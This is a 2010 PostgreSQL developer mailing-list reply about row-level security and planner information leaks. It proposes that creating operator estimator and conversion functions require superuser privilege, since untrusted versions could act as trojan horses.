(2010/10/14 1:52), Tom Lane wrote:
Robert Haas<robertmh...@gmail.com>  writes:
On Wed, Oct 13, 2010 at 11:45 AM, Tom Lane<t...@sss.pgh.pa.us>  wrote:
That's all true, but you have to consider how much the obstacle actually
gets in their way versus how painful it is on your end to create and
maintain the obstacle. �I don't think this proposed patch measures up
very well on either end of that tradeoff.

I think it would behoove us to try to separate concerns about this
particular patch from concerns about the viability of the whole
approach.  Whether or not it's useful to do X is a different question
than whether it can be done with few enough lines of code and/or
whether this patch actually does it well.

I think I left the wrong impression: I'm concerned about the whole
approach.  I haven't even read this particular patch lately.  I think
that trying to guarantee that the planner applies independent
constraints in a particular order will be expensive, fragile, and prone
to recurring security bugs no matter how it's implemented --- unless you
do it by lobotomizing query pullup/pushdown, which seems unacceptable
from a performance standpoint.

Just to give one example of what this patch misses (probably; as I said
I haven't read it lately), what about selectivity estimation?  One of
the things we like to do when we have an otherwise-unknown function is
to try it on all the histogram members and see what percentage yield
true.  That might already represent enough of an information leak to be
objectionable ... and yet, if we don't do it, the consequences for
performance could be pretty horrid because we'll have to work without
any reasonable selectivity estimate at all.  There are cases where this
technique isn't applied at the moment but probably should be, which is
why I characterize the leak-prevention idea as creating future security
issues: doing that is a constraint that will have to be accounted for in
every future planner change, and we are certain to miss the implications
sometimes.

Sorry, I might misread what you pointed out.

Do you see oprrest/oprjoin being internally invoked as a problem?
Well, I also think it is a problem, as long as they can be installed
by non-superusers. But, it is a separated problem from the row-level
security issues.

In my opinion, origin of the matter is incorrect checks on creation
of operators. It allows non-superusers to define a new operator with
restriction and join estimator as long as he has EXECUTE privilege
on the functions. (not EXECUTE privilege of actual user who invokes
this function on estimation phase!)
Then, the optimizer may internally invoke these functions without
any privilege checks on either the function or the table to be
estimated. If a malicious one tries to make other users to invoke
a trojan-horse, he can define a trappy operator with malicious
estimator functions, cannot it?

I think it is a situation that we should check superuser privilege
which means the specified functions have no malicious intention
and equivalent to the privilege to grant 'EXECUTE' to public.

Here is similar problem at conversion functions.
If malicious one want to install a fake conversion function that
records all the stream between server and client, it seems to me
not impossible.

Well, I'd like to suggest to revise the specifications of permission
checks on these commands. If we can ensure these functions are not
malicious, no need to care about information leaks via untrusted
functions internally used.

Thanks,
--
KaiGai Kohei <kai...@ak.jp.nec.com>

--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers

Reply via email to